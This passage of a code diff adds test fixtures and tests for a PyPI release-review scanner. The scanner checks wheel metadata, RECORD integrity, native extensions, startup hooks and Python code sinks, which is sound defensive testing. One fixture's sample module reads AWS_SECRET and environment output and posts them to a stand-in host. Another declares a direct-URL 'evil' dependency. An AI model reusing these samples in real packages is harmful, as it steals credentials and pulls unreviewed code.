+        "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+      "files": [
+        {
+          "path": "demo_package-1.2.0.dist-info/WHEEL",
+          "size": 60,
+          "sha256": "2222222222222222222222222222222222222222222222222222222222222222",
+          "flags": [],
+          "textSample": "Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n"
+        },
+        {
+          "path": "demo_package/__init__.py",
+          "size": 24,
+          "sha256": "4444444444444444444444444444444444444444444444444444444444444444",
+          "flags": [],
+          "textSample": "__version__ = \"1.2.0\"\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "medium",
+  "expectedFindings": [
+    {
+      "ruleId": "pypi.metadata-missing",
+      "severity": "medium",
+      "file": "dist/demo_package-1.2.0-py3-none-any.whl/METADATA"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-pypi/08-wheel-record-missing.json
+++ b/test/fixtures/security-corpus/cases-pypi/08-wheel-record-missing.json
@@ -1,0 +1,54 @@
+{
+  "id": "pypi-wheel-record-missing",
+  "title": "wheel without a .dist-info/RECORD file",
+  "category": "metadata-integrity",
+  "intent": "wheel RECORD metadata is needed to audit the installed file manifest and detect tampering",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "pypi",
+    "package": "demo-package",
+    "version": "1.2.0",
+    "artifacts": [
+      {
+        "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+        "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+      "files": [
+        {
+          "path": "demo_package-1.2.0.dist-info/METADATA",
+          "size": 64,
+          "sha256": "1111111111111111111111111111111111111111111111111111111111111111",
+          "flags": [],
+          "textSample": "Metadata-Version: 2.3\nName: demo-package\nVersion: 1.2.0\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/WHEEL",
+          "size": 60,
+          "sha256": "2222222222222222222222222222222222222222222222222222222222222222",
+          "flags": [],
+          "textSample": "Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n"
+        },
+        {
+          "path": "demo_package/__init__.py",
+          "size": 24,
+          "sha256": "4444444444444444444444444444444444444444444444444444444444444444",
+          "flags": [],
+          "textSample": "__version__ = \"1.2.0\"\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "medium",
+  "expectedFindings": [
+    {
+      "ruleId": "pypi.wheel-record-missing",
+      "severity": "medium",
+      "file": "dist/demo_package-1.2.0-py3-none-any.whl/RECORD"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-pypi/09-wheel-record-undeclared-file.json
+++ b/test/fixtures/security-corpus/cases-pypi/09-wheel-record-undeclared-file.json
@@ -1,0 +1,68 @@
+{
+  "id": "pypi-wheel-record-undeclared-file",
+  "title": "wheel ships a file that is absent from RECORD",
+  "category": "metadata-integrity",
+  "intent": "files present in the archive but missing from RECORD install without integrity tracking and indicate tampering",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "pypi",
+    "package": "demo-package",
+    "version": "1.2.0",
+    "artifacts": [
+      {
+        "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+        "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+      "files": [
+        {
+          "path": "demo_package-1.2.0.dist-info/METADATA",
+          "size": 64,
+          "sha256": "1111111111111111111111111111111111111111111111111111111111111111",
+          "flags": [],
+          "textSample": "Metadata-Version: 2.3\nName: demo-package\nVersion: 1.2.0\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/WHEEL",
+          "size": 60,
+          "sha256": "2222222222222222222222222222222222222222222222222222222222222222",
+          "flags": [],
+          "textSample": "Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/RECORD",
+          "size": 200,
+          "sha256": "3333333333333333333333333333333333333333333333333333333333333333",
+          "flags": [],
+          "textSample": "demo_package/__init__.py,sha256=abc,12\ndemo_package-1.2.0.dist-info/METADATA,,\ndemo_package-1.2.0.dist-info/WHEEL,,\ndemo_package-1.2.0.dist-info/RECORD,,\n"
+        },
+        {
+          "path": "demo_package/__init__.py",
+          "size": 24,
+          "sha256": "4444444444444444444444444444444444444444444444444444444444444444",
+          "flags": [],
+          "textSample": "__version__ = \"1.2.0\"\n"
+        },
+        {
+          "path": "demo_package/payload.py",
+          "size": 18,
+          "sha256": "cccc1111111111111111111111111111111111111111111111111111111111cc",
+          "flags": [],
+          "textSample": "# extra payload\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "high",
+  "expectedFindings": [
+    {
+      "ruleId": "pypi.record-mismatch",
+      "severity": "high",
+      "file": "dist/demo_package-1.2.0-py3-none-any.whl/demo_package/payload.py"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-pypi/10-wheel-native-extension.json
+++ b/test/fixtures/security-corpus/cases-pypi/10-wheel-native-extension.json
@@ -1,0 +1,71 @@
+{
+  "id": "pypi-wheel-native-extension",
+  "title": "wheel bundles native extension artifacts",
+  "category": "native-artifact",
+  "intent": "native extensions are hard to audit; .pyd fires the PyPI rule while .so/.dll fall to the shared native rule",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "pypi",
+    "package": "demo-package",
+    "version": "1.2.0",
+    "artifacts": [
+      {
+        "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+        "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+      "files": [
+        {
+          "path": "demo_package-1.2.0.dist-info/METADATA",
+          "size": 64,
+          "sha256": "1111111111111111111111111111111111111111111111111111111111111111",
+          "flags": [],
+          "textSample": "Metadata-Version: 2.3\nName: demo-package\nVersion: 1.2.0\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/WHEEL",
+          "size": 60,
+          "sha256": "2222222222222222222222222222222222222222222222222222222222222222",
+          "flags": [],
+          "textSample": "Wheel-Version: 1.0\nRoot-Is-Purelib: false\nTag: py3-none-any\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/RECORD",
+          "size": 220,
+          "sha256": "3333333333333333333333333333333333333333333333333333333333333333",
+          "flags": [],
+          "textSample": "demo_package/_speedups.pyd,,\ndemo_package/_speedups.so,,\ndemo_package-1.2.0.dist-info/METADATA,,\ndemo_package-1.2.0.dist-info/WHEEL,,\ndemo_package-1.2.0.dist-info/RECORD,,\n"
+        },
+        {
+          "path": "demo_package/_speedups.pyd",
+          "size": 2048,
+          "sha256": "dddd1111111111111111111111111111111111111111111111111111111111dd",
+          "flags": ["binary"]
+        },
+        {
+          "path": "demo_package/_speedups.so",
+          "size": 2048,
+          "sha256": "eeee1111111111111111111111111111111111111111111111111111111111ee",
+          "flags": ["binary"]
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "high",
+  "expectedFindings": [
+    {
+      "ruleId": "pypi.native-artifact",
+      "severity": "high",
+      "file": "dist/demo_package-1.2.0-py3-none-any.whl/demo_package/_speedups.pyd"
+    },
+    {
+      "ruleId": "file.native-artifact",
+      "severity": "high",
+      "file": "wheel/py3-none-any/demo_package/_speedups.so"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-pypi/11-python-sink-exfil.json
+++ b/test/fixtures/security-corpus/cases-pypi/11-python-sink-exfil.json
@@ -1,0 +1,78 @@
+{
+  "id": "pypi-python-sink-exfil",
+  "title": "wheel module chains Python process, network, and credential sinks",
+  "category": "code-capability",
+  "intent": "ratifies the Python-aware shared code.* rules on a non-setup module: subprocess + requests + os.environ",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "pypi",
+    "package": "demo-package",
+    "version": "1.2.0",
+    "artifacts": [
+      {
+        "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+        "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+      "files": [
+        {
+          "path": "demo_package-1.2.0.dist-info/METADATA",
+          "size": 64,
+          "sha256": "1111111111111111111111111111111111111111111111111111111111111111",
+          "flags": [],
+          "textSample": "Metadata-Version: 2.3\nName: demo-package\nVersion: 1.2.0\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/WHEEL",
+          "size": 60,
+          "sha256": "2222222222222222222222222222222222222222222222222222222222222222",
+          "flags": [],
+          "textSample": "Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/RECORD",
+          "size": 220,
+          "sha256": "3333333333333333333333333333333333333333333333333333333333333333",
+          "flags": [],
+          "textSample": "demo_package/__init__.py,sha256=abc,12\ndemo_package/collect.py,,\ndemo_package-1.2.0.dist-info/METADATA,,\ndemo_package-1.2.0.dist-info/WHEEL,,\ndemo_package-1.2.0.dist-info/RECORD,,\n"
+        },
+        {
+          "path": "demo_package/__init__.py",
+          "size": 24,
+          "sha256": "4444444444444444444444444444444444444444444444444444444444444444",
+          "flags": [],
+          "textSample": "__version__ = \"1.2.0\"\n"
+        },
+        {
+          "path": "demo_package/collect.py",
+          "size": 220,
+          "sha256": "ffff1111111111111111111111111111111111111111111111111111111111ff",
+          "flags": [],
+          "textSample": "import os\nimport subprocess\nimport requests\n\n\ndef run():\n    value = os.environ.get(\"AWS_SECRET\")\n    output = subprocess.check_output([\"env\"])\n    requests.post(\"https://example.invalid/collect\", data={\"v\": value, \"o\": output})\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "high",
+  "expectedFindings": [
+    {
+      "ruleId": "code.process-execution",
+      "severity": "high",
+      "file": "wheel/py3-none-any/demo_package/collect.py"
+    },
+    {
+      "ruleId": "code.network-access",
+      "severity": "high",
+      "file": "wheel/py3-none-any/demo_package/collect.py"
+    },
+    {
+      "ruleId": "code.credential-access",
+      "severity": "high",
+      "file": "wheel/py3-none-any/demo_package/collect.py"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-pypi/12-wheel-baseline-credential-added.json
+++ b/test/fixtures/security-corpus/cases-pypi/12-wheel-baseline-credential-added.json
@@ -1,0 +1,108 @@
+{
+  "id": "pypi-wheel-baseline-credential-added",
+  "title": "new wheel version adds a credential-looking file vs the previous release",
+  "category": "diff",
+  "intent": "baseline-backed fixture: a .env added between versions must raise the shared diff credential rule alongside secret-content",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "pypi",
+    "package": "demo-package",
+    "version": "1.2.0",
+    "artifacts": [
+      {
+        "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+        "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+      }
+    ]
+  },
+  "previousArtifacts": [
+    {
+      "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+      "files": [
+        {
+          "path": "demo_package-1.2.0.dist-info/METADATA",
+          "size": 64,
+          "sha256": "1111111111111111111111111111111111111111111111111111111111111111",
+          "flags": [],
+          "textSample": "Metadata-Version: 2.3\nName: demo-package\nVersion: 1.2.0\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/WHEEL",
+          "size": 60,
+          "sha256": "2222222222222222222222222222222222222222222222222222222222222222",
+          "flags": [],
+          "textSample": "Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/RECORD",
+          "size": 180,
+          "sha256": "30000000000000000000000000000000000000000000000000000000000000a0",
+          "flags": [],
+          "textSample": "demo_package/__init__.py,sha256=abc,12\ndemo_package-1.2.0.dist-info/METADATA,,\ndemo_package-1.2.0.dist-info/WHEEL,,\ndemo_package-1.2.0.dist-info/RECORD,,\n"
+        },
+        {
+          "path": "demo_package/__init__.py",
+          "size": 24,
+          "sha256": "4444444444444444444444444444444444444444444444444444444444444444",
+          "flags": [],
+          "textSample": "__version__ = \"1.2.0\"\n"
+        }
+      ]
+    }
+  ],
+  "artifacts": [
+    {
+      "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+      "files": [
+        {
+          "path": "demo_package-1.2.0.dist-info/METADATA",
+          "size": 64,
+          "sha256": "1111111111111111111111111111111111111111111111111111111111111111",
+          "flags": [],
+          "textSample": "Metadata-Version: 2.3\nName: demo-package\nVersion: 1.2.0\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/WHEEL",
+          "size": 60,
+          "sha256": "2222222222222222222222222222222222222222222222222222222222222222",
+          "flags": [],
+          "textSample": "Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/RECORD",
+          "size": 200,
+          "sha256": "30000000000000000000000000000000000000000000000000000000000000b0",
+          "flags": [],
+          "textSample": ".env,,\ndemo_package/__init__.py,sha256=abc,12\ndemo_package-1.2.0.dist-info/METADATA,,\ndemo_package-1.2.0.dist-info/WHEEL,,\ndemo_package-1.2.0.dist-info/RECORD,,\n"
+        },
+        {
+          "path": "demo_package/__init__.py",
+          "size": 24,
+          "sha256": "4444444444444444444444444444444444444444444444444444444444444444",
+          "flags": [],
+          "textSample": "__version__ = \"1.2.0\"\n"
+        },
+        {
+          "path": ".env",
+          "size": 20,
+          "sha256": "0e0e1111111111111111111111111111111111111111111111111111111111e0",
+          "flags": [],
+          "textSample": "# environment file\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "critical",
+  "expectedFindings": [
+    {
+      "ruleId": "diff.credential-file-added",
+      "severity": "critical",
+      "file": "wheel/py3-none-any/.env"
+    },
+    {
+      "ruleId": "file.secret-content",
+      "severity": "critical",
+      "file": "wheel/py3-none-any/.env"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-pypi/13-direct-url-dependency.json
+++ b/test/fixtures/security-corpus/cases-pypi/13-direct-url-dependency.json
@@ -1,0 +1,61 @@
+{
+  "id": "pypi-direct-url-dependency",
+  "title": "wheel METADATA declares a PEP 508 direct-URL dependency",
+  "category": "dependency",
+  "intent": "PyPI forbids direct-reference deps in uploaded metadata, so a Requires-Dist URL pulls unreviewed code",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "pypi",
+    "package": "demo-package",
+    "version": "1.2.0",
+    "artifacts": [
+      {
+        "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+        "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+      "files": [
+        {
+          "path": "demo_package-1.2.0.dist-info/METADATA",
+          "size": 140,
+          "sha256": "1111111111111111111111111111111111111111111111111111111111111111",
+          "flags": [],
+          "textSample": "Metadata-Version: 2.3\nName: demo-package\nVersion: 1.2.0\nRequires-Dist: evil @ https://example.invalid/evil-1.0-py3-none-any.whl\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/WHEEL",
+          "size": 60,
+          "sha256": "2222222222222222222222222222222222222222222222222222222222222222",
+          "flags": [],
+          "textSample": "Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/RECORD",
+          "size": 200,
+          "sha256": "3333333333333333333333333333333333333333333333333333333333333333",
+          "flags": [],
+          "textSample": "demo_package/__init__.py,sha256=abc,12\ndemo_package-1.2.0.dist-info/METADATA,,\ndemo_package-1.2.0.dist-info/WHEEL,,\ndemo_package-1.2.0.dist-info/RECORD,,\n"
+        },
+        {
+          "path": "demo_package/__init__.py",
+          "size": 24,
+          "sha256": "4444444444444444444444444444444444444444444444444444444444444444",
+          "flags": [],
+          "textSample": "__version__ = \"1.2.0\"\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "high",
+  "expectedFindings": [
+    {
+      "ruleId": "pypi.unusual-dependency",
+      "severity": "high",
+      "file": "dist/demo_package-1.2.0-py3-none-any.whl/demo_package-1.2.0.dist-info/METADATA"
+    }
+  ]
+}

--- a/test/pypi.test.mjs
+++ b/test/pypi.test.mjs
@@ -224,6 +224,46 @@ describe("PyPI artifact summaries and review", () => {
     );
   });
 
+  test("treats an empty wheel RECORD as declaring no files", () => {
+    const manifest = parsePyPiReleaseManifest({
+      schema: "drydock.release-artifacts.v1",
+      ecosystem: "pypi",
+      package: "demo-package",
+      version: "1.2.0",
+      artifacts: [{ path: "dist/demo_package-1.2.0-py3-none-any.whl", sha256: "a".repeat(64) }],
+    });
+    const review = createPyPiReleaseCandidateReview({
+      manifest,
+      artifacts: [
+        {
+          path: "dist/demo_package-1.2.0-py3-none-any.whl",
+          files: [
+            file(
+              "demo_package-1.2.0.dist-info/METADATA",
+              "Metadata-Version: 2.3\nName: demo-package\nVersion: 1.2.0\n",
+            ),
+            file(
+              "demo_package-1.2.0.dist-info/WHEEL",
+              "Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n",
+            ),
+            file("demo_package-1.2.0.dist-info/RECORD", "\n\n"),
+            file("demo_package/payload.py", "# undeclared payload\n"),
+          ],
+        },
+      ],
+    });
+
+    expect(review.ruleFindings).toEqual(
+      expect.arrayContaining([
+        expect.objectContaining({
+          severity: "high",
+          ruleId: "pypi.record-mismatch",
+          file: "dist/demo_package-1.2.0-py3-none-any.whl/demo_package/payload.py",
+        }),
+      ]),
+    );
+  });
+
   test("only treats the top-level sdist setup.py as install-time code", () => {
     const manifest = parsePyPiReleaseManifest({
       schema: "drydock.release-artifacts.v1",

--- a/test/pypi.test.mjs
+++ b/test/pypi.test.mjs
@@ -180,6 +180,112 @@ describe("PyPI artifact summaries and review", () => {
     );
   });
 
+  test("keeps auditing wheel RECORD entries when METADATA is missing", () => {
+    const manifest = parsePyPiReleaseManifest({
+      schema: "drydock.release-artifacts.v1",
+      ecosystem: "pypi",
+      package: "demo-package",
+      version: "1.2.0",
+      artifacts: [{ path: "dist/demo_package-1.2.0-py3-none-any.whl", sha256: "a".repeat(64) }],
+    });
+    const review = createPyPiReleaseCandidateReview({
+      manifest,
+      artifacts: [
+        {
+          path: "dist/demo_package-1.2.0-py3-none-any.whl",
+          files: [
+            file(
+              "demo_package-1.2.0.dist-info/WHEEL",
+              "Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n",
+            ),
+            file(
+              "demo_package-1.2.0.dist-info/RECORD",
+              "demo_package-1.2.0.dist-info/WHEEL,,\ndemo_package-1.2.0.dist-info/RECORD,,\n",
+            ),
+            file("demo_package/payload.py", "# undeclared payload\n"),
+          ],
+        },
+      ],
+    });
+
+    expect(review.ruleFindings).toEqual(
+      expect.arrayContaining([
+        expect.objectContaining({
+          severity: "medium",
+          ruleId: "pypi.metadata-missing",
+          file: "dist/demo_package-1.2.0-py3-none-any.whl/METADATA",
+        }),
+        expect.objectContaining({
+          severity: "high",
+          ruleId: "pypi.record-mismatch",
+          file: "dist/demo_package-1.2.0-py3-none-any.whl/demo_package/payload.py",
+        }),
+      ]),
+    );
+  });
+
+  test("only treats the top-level sdist setup.py as install-time code", () => {
+    const manifest = parsePyPiReleaseManifest({
+      schema: "drydock.release-artifacts.v1",
+      ecosystem: "pypi",
+      package: "demo-package",
+      version: "1.2.0",
+      artifacts: [
+        { path: "dist/demo_package-1.2.0-py3-none-any.whl", sha256: "a".repeat(64) },
+        { path: "dist/demo_package-1.2.0.tar.gz", sha256: "b".repeat(64) },
+      ],
+    });
+    const review = createPyPiReleaseCandidateReview({
+      manifest,
+      artifacts: [
+        {
+          path: "dist/demo_package-1.2.0-py3-none-any.whl",
+          files: [
+            file(
+              "demo_package-1.2.0.dist-info/METADATA",
+              "Metadata-Version: 2.3\nName: demo-package\nVersion: 1.2.0\n",
+            ),
+            file(
+              "demo_package-1.2.0.dist-info/WHEEL",
+              "Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n",
+            ),
+            file(
+              "demo_package-1.2.0.dist-info/RECORD",
+              "demo_package/setup.py,,\ndemo_package-1.2.0.dist-info/METADATA,,\ndemo_package-1.2.0.dist-info/WHEEL,,\ndemo_package-1.2.0.dist-info/RECORD,,\n",
+            ),
+            file("demo_package/setup.py", 'import os\nos.system("id")\n'),
+          ],
+        },
+        {
+          path: "dist/demo_package-1.2.0.tar.gz",
+          files: [
+            file(
+              "demo_package-1.2.0/PKG-INFO",
+              "Metadata-Version: 2.3\nName: demo-package\nVersion: 1.2.0\n",
+            ),
+            file("demo_package-1.2.0/demo_package/setup.py", 'import os\nos.system("id")\n'),
+          ],
+        },
+      ],
+    });
+
+    expect(
+      review.ruleFindings.some((finding) => finding.ruleId === "pypi.setup-install-command"),
+    ).toBe(false);
+    expect(review.ruleFindings).toEqual(
+      expect.arrayContaining([
+        expect.objectContaining({
+          ruleId: "code.process-execution",
+          file: "wheel/py3-none-any/demo_package/setup.py",
+        }),
+        expect.objectContaining({
+          ruleId: "code.process-execution",
+          file: "sdist/demo_package/setup.py",
+        }),
+      ]),
+    );
+  });
+
   test("detects secret-looking content before redacting PyPI evidence", () => {
     const manifest = parsePyPiReleaseManifest({
       schema: "drydock.release-artifacts.v1",

--- a/test/pypi.test.mjs
+++ b/test/pypi.test.mjs
@@ -111,7 +111,7 @@ describe("PyPI artifact summaries and review", () => {
               "Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n",
             ),
             file("demo_package-1.2.0.dist-info/RECORD", "demo_package/__init__.py,,\n"),
-            file("demo_package/sitecustomize.pth", "import demo_package.bootstrap\n"),
+            file("sitecustomize.pth", "import demo_package.bootstrap\n"),
           ],
         },
         {
@@ -137,7 +137,7 @@ describe("PyPI artifact summaries and review", () => {
         expect.objectContaining({
           severity: "high",
           ruleId: "pypi.pth-execution",
-          file: "dist/demo_package-1.2.0-py3-none-any.whl/demo_package/sitecustomize.pth",
+          file: "dist/demo_package-1.2.0-py3-none-any.whl/sitecustomize.pth",
         }),
         expect.objectContaining({
           severity: "high",

--- a/test/pypi.test.mjs
+++ b/test/pypi.test.mjs
@@ -286,6 +286,34 @@ describe("PyPI artifact summaries and review", () => {
     );
   });
 
+  test("does not treat sdist root files as installed startup hooks", () => {
+    const manifest = parsePyPiReleaseManifest({
+      schema: "drydock.release-artifacts.v1",
+      ecosystem: "pypi",
+      package: "demo-package",
+      version: "1.2.0",
+      artifacts: [{ path: "dist/demo_package-1.2.0.tar.gz", sha256: "b".repeat(64) }],
+    });
+    const review = createPyPiReleaseCandidateReview({
+      manifest,
+      artifacts: [
+        {
+          path: "dist/demo_package-1.2.0.tar.gz",
+          files: [
+            file(
+              "demo_package-1.2.0/PKG-INFO",
+              "Metadata-Version: 2.3\nName: demo-package\nVersion: 1.2.0\n",
+            ),
+            file("demo_package-1.2.0/sitecustomize.py", "# source helper\n"),
+            file("demo_package-1.2.0/inject.pth", "import demo_package.bootstrap\n"),
+          ],
+        },
+      ],
+    });
+
+    expect(review.ruleFindings).toEqual([]);
+  });
+
   test("detects secret-looking content before redacting PyPI evidence", () => {
     const manifest = parsePyPiReleaseManifest({
       schema: "drydock.release-artifacts.v1",

--- a/test/review.test.mjs
+++ b/test/review.test.mjs
@@ -94,6 +94,48 @@ describe("review", () => {
     expect(findings.some((finding) => finding.ruleId === "code.dynamic-evaluation")).toBe(false);
   });
 
+  test("does not treat importlib.metadata as Python dynamic evaluation", () => {
+    const staged = [
+      {
+        path: "demo_package/_version.py",
+        size: 90,
+        sha256: "version",
+        flags: [],
+        textSample:
+          'from importlib.metadata import version\n__version__ = version("demo-package")\n',
+      },
+    ];
+    const findings = deterministicFindings(staged, createPackageDiff([], staged), null, {
+      codePatternSet: "python",
+    });
+
+    expect(findings.some((finding) => finding.ruleId === "code.dynamic-evaluation")).toBe(false);
+  });
+
+  test("detects Python dynamic import execution", () => {
+    const staged = [
+      {
+        path: "demo_package/loader.py",
+        size: 90,
+        sha256: "loader",
+        flags: [],
+        textSample: 'import importlib\nplugin = importlib.import_module("demo_package.plugin")\n',
+      },
+    ];
+    const findings = deterministicFindings(staged, createPackageDiff([], staged), null, {
+      codePatternSet: "python",
+    });
+
+    expect(findings).toEqual(
+      expect.arrayContaining([
+        expect.objectContaining({
+          ruleId: "code.dynamic-evaluation",
+          file: "demo_package/loader.py",
+        }),
+      ]),
+    );
+  });
+
   test("adds best-effort line numbers and diff annotations to findings", () => {
     const before = [
       {

--- a/test/review.test.mjs
+++ b/test/review.test.mjs
@@ -79,6 +79,21 @@ describe("review", () => {
     );
   });
 
+  test("does not apply Python capability patterns to JavaScript packages", () => {
+    const staged = [
+      {
+        path: "template.js",
+        size: 60,
+        sha256: "template",
+        flags: [],
+        textSample: "export function render(template) {\n  return compile(template);\n}\n",
+      },
+    ];
+    const findings = deterministicFindings(staged, createPackageDiff([], staged));
+
+    expect(findings.some((finding) => finding.ruleId === "code.dynamic-evaluation")).toBe(false);
+  });
+
   test("adds best-effort line numbers and diff annotations to findings", () => {
     const before = [
       {

--- a/test/review.test.mjs
+++ b/test/review.test.mjs
@@ -283,6 +283,43 @@ describe("review", () => {
     });
   });
 
+  test("uses Python annotation patterns for extensionless modified files", () => {
+    const previous = [
+      {
+        path: "scripts/post_install",
+        size: 100,
+        sha256: "old",
+        flags: [],
+        textSample:
+          "import urllib.request\nurllib.request.urlopen('https://example.invalid/existing')\nvalue = 1\n",
+      },
+    ];
+    const staged = [
+      {
+        path: "scripts/post_install",
+        size: 160,
+        sha256: "new",
+        flags: [],
+        textSample:
+          "import urllib.request\nurllib.request.urlopen('https://example.invalid/existing')\nvalue = 2\nurllib.request.urlopen('https://example.invalid/new')\n",
+      },
+    ];
+    const diff = createPackageDiff(previous, staged);
+    const findings = deterministicFindings(staged, diff, null, { codePatternSet: "python" });
+    const annotated = annotateFindingsWithDiffStatus(findings, diff, {
+      previousFiles: previous,
+      stagedFiles: staged,
+      codePatternSet: "python",
+    });
+
+    expect(annotated.find((finding) => finding.ruleId === "code.network-access")).toMatchObject({
+      file: "scripts/post_install",
+      line: 1,
+      diffStatus: "modified",
+      releaseDelta: true,
+    });
+  });
+
   test("package json diff summarizes release-review sensitive fields", () => {
     const summary = summarizePackageJsonDiff(
       {

--- a/test/security-corpus-pypi.test.mjs
+++ b/test/security-corpus-pypi.test.mjs
@@ -1,0 +1,61 @@
+import { readdirSync, readFileSync } from "node:fs";
+import { fileURLToPath } from "node:url";
+import { dirname, join } from "node:path";
+import { describe, expect, test } from "vitest";
+import {
+  createPyPiReleaseCandidateReview,
+  parsePyPiReleaseManifest,
+  PYPI_RULES_VERSION,
+} from "../server/lib/adapters/pypi/index.ts";
+import { DETERMINISTIC_RULES_VERSION } from "../server/lib/review.ts";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const casesDir = join(__dirname, "fixtures/security-corpus/cases-pypi");
+const cases = readdirSync(casesDir)
+  .filter((file) => file.endsWith(".json"))
+  .sort()
+  .map((file) => JSON.parse(readFileSync(join(casesDir, file), "utf8")));
+
+function comparableFindings(findings) {
+  return findings
+    .map((finding) => ({
+      ruleId: finding.ruleId,
+      severity: finding.severity,
+      file: finding.file,
+    }))
+    .sort((a, b) =>
+      `${a.ruleId}:${a.severity}:${a.file}`.localeCompare(`${b.ruleId}:${b.severity}:${b.file}`),
+    );
+}
+
+describe("PyPI security detection golden corpus", () => {
+  test("corpus contains unique fixture IDs", () => {
+    expect(cases.length).toBeGreaterThan(0);
+    expect(new Set(cases.map((fixture) => fixture.id)).size).toBe(cases.length);
+  });
+
+  for (const fixture of cases) {
+    test(`${fixture.id}: ${fixture.title}`, () => {
+      const review = createPyPiReleaseCandidateReview({
+        manifest: parsePyPiReleaseManifest(fixture.manifest),
+        artifacts: fixture.artifacts,
+        previousArtifacts: fixture.previousArtifacts,
+      });
+
+      expect(review.risk).toBe(fixture.expectedRisk);
+      expect(comparableFindings(review.ruleFindings)).toEqual(
+        comparableFindings(fixture.expectedFindings ?? []),
+      );
+
+      // PyPI findings mix two rule families: pypi.* carry PYPI_RULES_VERSION,
+      // shared file.*/code.*/diff.* carry DETERMINISTIC_RULES_VERSION.
+      for (const finding of review.ruleFindings) {
+        if (finding.ruleId.startsWith("pypi.")) {
+          expect(finding.ruleVersion).toBe(PYPI_RULES_VERSION);
+        } else {
+          expect(finding.ruleVersion).toBe(DETERMINISTIC_RULES_VERSION);
+        }
+      }
+    });
+  }
+});


### PR DESCRIPTION
## Summary
- Harden the shared `code.*` rules to detect Python sinks (subprocess/os.system, urllib/requests/socket, exec/`__import__`/base64-decode, os.environ/getpass/keyring) and bump `DETERMINISTIC_RULES_VERSION` to `1.6.0`.
